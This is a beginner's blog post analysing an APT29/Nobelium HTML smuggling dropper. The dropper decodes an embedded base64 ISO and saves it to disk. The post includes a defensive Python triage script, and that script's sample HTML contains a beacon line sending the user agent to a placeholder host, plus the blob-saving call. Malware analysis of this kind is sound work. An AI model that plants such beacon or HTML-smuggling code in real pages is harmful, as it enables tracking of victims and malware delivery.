Analyzing Nobelium's HTML Dropper - EnvyScout

TL;DR: In a recent incident, Nobelium (APT-29) used an HTML dropper to decode a file embedded in the page and store it on the disk.

Recently, I got my hands on a malware sample used by Nobelium / APT29 and wanted to use this opportunity to learn and revise my malware analysis skills 😄

Please review my work and provide feedback at my n00b-ish attempt at Malware analysis 😄

Analysis Summary:

  • [ASSUMPTION] Attacker sends a malicious HTML file or a link to the victim

  • [ASSUMPTION] Victim opens the file

  • There's a hardcoded string (~2.8 MB) that's converted from base64 to an Array Buffer

  • This array buffer (which is an ISO file) is written onto disk using built-in browser API calls

  • This ISO file contains 3 files: an exe and 2 DLLs. While these were interesting, it's a story for another day.

Analysis In-Detail:

At first look, the HTML dropper seems to be built in a not-so-sophisticated way, as we immediately encounter the malicious domain the malware is communicating with. What's more eye-popping for a malware analyst than a malicious domain hardcoded in a malware sample 😂

Analyzing the code more deeply, the first function takes an input text and uses the "window.navigator.msSaveOrOpenBlob" API call to download a file. Now, I'm not a JS expert by any means, but I can do good googling (if that's even a word, lol), and it looks like our folks have taken some inspiration (pun intended) from CodePen. After all, they are like normal developers who love copying code from online 😂

Moving on, they seem to be sending a beacon ping (kind of like a "Hi, someone clicked me") to their malicious URL along with the IP of the user and the user agent. I'm not sure why they were sending a request to IPIFY. I assume they wanted to get the current IP of the user, but they're not really utilizing it. Seems like unfinished code (not surprised). However, this is just a function definition, and we'll have to see when it is actually called.

Further down, there seems to be a string (~2.8 MB) which is base64 encoded.

Below that is the function which is kind of the one that does all the magic; again, not a JS expert, but it looks like they copied yet another piece of code, this time from StackOverflow.

Combining both pieces together, it looks like the JS is decoding the base64 string into an array buffer and writing it to the disk using the previously discovered function. Dynamic analysis indicates that it's an ISO file containing possibly malicious samples.
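To triage a dropper like this without running it, an analyst can pull the same three indicators straight out of the HTML: the Blob-saving API, the beacon/IPIFY URLs, and any long base64 run, which is then decoded in memory and checked for the ISO9660 signature ("CD001" at offset 0x8001). The script below is an added example, not code from the post or the sample; the HTML and the ISO-like payload inside it are constructed stand-ins built at runtime, and the beacon domain is a placeholder.

```python
import base64
import hashlib
import re

# Constructed stand-in for the dropper: a 32 KB+ ISO9660-like image (primary
# volume descriptor type byte 0x01 at 0x8000, "CD001" at 0x8001) embedded as
# base64, plus the Blob-saving API and the beacon/IPIFY requests the post notes.
FAKE_ISO = b"\x00" * 0x8000 + b"\x01CD001\x01\x00" + b"\x00" * 0x100
SAMPLE_HTML = (
    "<html><script>\n"
    "function save(name, blob){ window.navigator.msSaveOrOpenBlob(blob, name); }\n"
    "fetch('https://api.ipify.org?format=json');\n"
    "fetch('https://beacon.example.invalid/ping?ua=' + navigator.userAgent);\n"
    'var payload = "' + base64.b64encode(FAKE_ISO).decode() + '";\n'
    "</script></html>"
)

# A real dropper carries a multi-megabyte string; 256 chars is a low triage floor.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{256,}={0,2}")
URL = re.compile(r"https?://[A-Za-z0-9._\-/?=&%]+")

def identify(data: bytes) -> str:
    """Classify a decoded blob by its magic bytes; ISO9660 is what this dropper ships."""
    if data[0x8001:0x8006] == b"CD001":
        return "iso9660"
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"PK\x03\x04":
        return "zip"
    return "unknown"

def triage(html: str) -> dict:
    """Extract the smuggling indicators from an HTML file, decoding payloads only in memory."""
    payloads = []
    for m in B64_RUN.finditer(html):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not real base64, skip it
            continue
        payloads.append({"size": len(data), "type": identify(data),
                         "sha256": hashlib.sha256(data).hexdigest()})
    return {
        "saves_blob_to_disk": "msSaveOrOpenBlob" in html,
        "uses_ipify": "ipify.org" in html,
        "urls": sorted(set(URL.findall(html))),
        "payloads": payloads,
    }

if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
```

Pointing `triage()` at the real dropper gives the payload hash and type for a report without ever writing the ISO to disk.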

There seem to be 2 DLLs and 1 EXE that were dropped as part of the malware package. Looks interesting and will definitely keep me occupied after work 🥷

This looks like a previously documented variant.
